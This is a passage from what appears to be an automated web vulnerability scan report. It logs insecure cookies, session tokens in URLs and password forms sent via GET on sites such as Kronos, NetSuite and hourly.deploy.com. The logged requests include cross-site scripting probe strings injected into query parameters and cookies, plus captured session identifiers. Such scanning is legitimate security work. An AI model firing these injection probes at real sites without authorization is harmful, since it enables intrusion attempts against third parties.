The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDQCDRBTRC=NNLPKKJCDHNIPJJGHAECJHGA; path=/
Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
KTMDWestLB=385942538.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:52:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDQCDRBTRC=NNLPKKJCDHNIPJJGHAECJHGA; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=385942538.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>

11.20. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=d8308cb242bf2b615f7a;path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hmc/report/ HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.21. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=3e307db0b53d142e16b3;path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hmc/report/index.cfm?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 102

email=netsparker%40example.com&j_password=3&j_passwordconfirm=3&j_username=Smith&name=Smith&storenum=3

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e307db0b53d142e16b3;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...

11.22. https://www.fusionvm.com/FusionVM/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.fusionvm.com
Path:	/FusionVM/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=z4su31o2100elwiksplqkftw; path=/; HttpOnly
CriticalWatch_WinMgmt=a623626d-8fc7-42a5-b103-e9b75ad79594; expires=Mon, 25-Apr-2011 13:19:53 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FusionVM/ HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: CriticalWatch_WinMgmt=a623626d-8fc7-42a5-b103-e9b75ad79594; expires=Mon, 25-Apr-2011 13:19:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=z4su31o2100elwiksplqkftw; path=/; HttpOnly
Date: Mon, 25 Apr 2011 12:54:52 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2>
</body></html>

11.23. https://checkout.netsuite.com/s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NLShopperId=rcHW8495AYQCDmZk; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

HEAD /s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=G4QzN1GchdfPr9rBJblBVPSQ5Jt63Zmb6JGBswSzDh2vP1LYSpzFqQ8ySNfk1fymwpy48cGyMdHsh0Qm2hgLvMGK1fgWxg2xsZBXTmhKB8Q22BrCVLQTv4mvdvnrtvGT!-1220802186; NLVisitorId=rcHW8495AXQCDpzW; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:26:37 GMT
Server: Apache
Location: http://shopping.netsuite.com/s.nl?alias=s&c=438708&n=1
Expires: 0
NS_RTIMER_COMPOSITE: 668885514:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId=rcHW8495AYQCDmZk; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect to shopping server for shopping requests
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8

11.24. https://customer.kronos.com/Default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/Default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ICRedirect=Url=nsextt%3D%252527%252522%2D%2D%25253E%25253C%25252Fstyle%25253E%25253C%25252Fscript%25253E%25253Cscript%25253Enetsparker%2525280x000003%252529%25253C%25252Fscript%25253E; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.asp?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000003%2529%253C%252Fscript%253E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Cookie: ICRedirect=Url=nsextt%3D%27%2522%2D%2D%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Enetsparker%280x000002%29%253C%2Fscript%253E; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=FKMMPBCAJIEPPLMFHLPCHMNK
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=nsextt%3D%252527%252522%2D%2D%25253E%25253C%25252Fstyle%25253E%25253C%25252Fscript%25253E%25253Cscript%25253Enetsparker%2525280x000003%252529%25253C%25252Fscript%25253E; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

11.25. https://customer.kronos.com/user/forgotpassword.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/forgotpassword.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

Visitor=173%2E193%2E214%2E243; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgotpassword.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13005
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

11.26. https://customer.kronos.com/user/forgotusername.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/forgotusername.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

Visitor=173%2E193%2E214%2E243; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgotusername.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13247
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

11.27. https://customer.kronos.com/user/logindenied.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/logindenied.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

Visitor=173%2E193%2E214%2E243; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/logindenied.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/Default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

12. Session token in URL previous next
There are 5 instances of this issue:

http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard
http://mbox5.offermatica.com/m2/netsuite/mbox/standard
http://mbox9e.offermatica.com/m2/eset/mbox/standard
http://shopping.netsuite.com/app/site/query/additemtocart.nl
http://shopping.netsuite.com/s.nl

12.1. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://kronos.tt.omtrdc.net
Path:	/m2/kronos/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40

Request

GET /m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: kronos.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 102
Date: Mon, 25 Apr 2011 13:51:37 GMT
Server: Test & Target

mboxFactories.get('default').get('Button_cta_right_rail',0).setOffer(new mboxOfferDefault()).loaded();

12.2. http://mbox5.offermatica.com/m2/netsuite/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mbox5.offermatica.com
Path:	/m2/netsuite/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://mbox5.offermatica.com/m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1303736347554-914602&mboxPC=1303736347554-914602.17&mboxPage=1303742461357-40763&mboxCount=1&mbox=overall_conversion_tracking-mbox&mboxId=0&mboxURL=http%3A//www.netsuite.com/portal/page_not_found.shtml&mboxReferrer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT&mboxVersion=28

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1303736347554-914602&mboxPC=1303736347554-914602.17&mboxPage=1303742461357-40763&mboxCount=1&mbox=overall_conversion_tracking-mbox&mboxId=0&mboxURL=http%3A//www.netsuite.com/portal/page_not_found.shtml&mboxReferrer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT&mboxVersion=28 HTTP/1.1
Host: mbox5.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1278
Date: Mon, 25 Apr 2011 14:40:50 GMT
Server: Test & Target

var mboxCurrent=mboxFactoryDefault.get('overall_conversion_tracking-mbox',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-o
...[SNIP]...

12.3. http://mbox9e.offermatica.com/m2/eset/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mbox9e.offermatica.com
Path:	/m2/eset/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://mbox9e.offermatica.com/m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 168
Date: Mon, 25 Apr 2011 12:58:56 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_store_con',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303736347554-914602.17");

12.4. http://shopping.netsuite.com/app/site/query/additemtocart.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://shopping.netsuite.com
Path:	/app/site/query/additemtocart.nl

Issue detail

The URL in the request appears to contain a session token within the query string:

http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303736347554-914602&productId=1650

Request

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303736347554-914602&productId=1650 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 62

buyid=1650&Submit.x=43&Submit.y=8&c=438708&qtyadd=1&promocode=

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 12:59:54 GMT
Server: Apache
Location: /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=
Expires: 0
NS_RTIMER_COMPOSITE: 1120473518:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=mvcnN1wK94GbYGym1LHB3yTs2BZr95jnRnSsg8T7DSWtbMRrnz2jSQhVXgBz1h5FmvJJRnm7G9v0khqbf08h4CZVwXzh2xQ10sHch9Mv5nsHgKz9z2JDTpTGpvdc67Ch!719211912; path=/
Set-Cookie: NLVisitorId=rcHW8415ATCkvpg2; domain=shopping.netsuite.com; expires=Sunday, 15-Apr-2012 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

12.5. http://shopping.netsuite.com/s.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The URL in the request appears to contain a session token within the query string:

http://shopping.netsuite.com/s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=

Request

GET /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NLPromocode=438708_; promocode=; NS_VER=2011.1.0

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 25 Apr 2011 12:59:55 GMT
Server: Apache
Location: /s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8
NS_RTIMER_COMPOSITE: 1229161202:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect after consuming actionable parameters
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

13. Password field submitted using GET method previous next
There are 5 instances of this issue:

http://direct.yandex.ru/pages/direct/_direct-1303387947.js
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
http://my.webalta.ru/public/engine/templates.js
http://my.webalta.ru/public/engine/templates.js

13.1. http://direct.yandex.ru/pages/direct/_direct-1303387947.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://direct.yandex.ru/pages/direct/_direct-1303387947.js

The form contains the following password field:

passwd

Request

Response

13.2. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://hourly.deploy.com/hmc/report/index.cfm?'

The form contains the following password field:

j_password

Request

GET /hmc/report/?'"--></style></script><script>netsparker(0x000054)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

13.3. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://hourly.deploy.com/hmc/report/index.cfm?'

The form contains the following password field:

j_password

Request

GET /hmc/report/index.cfm?'"--></style></script><script>netsparker(0x00004F)</script> HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:01 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
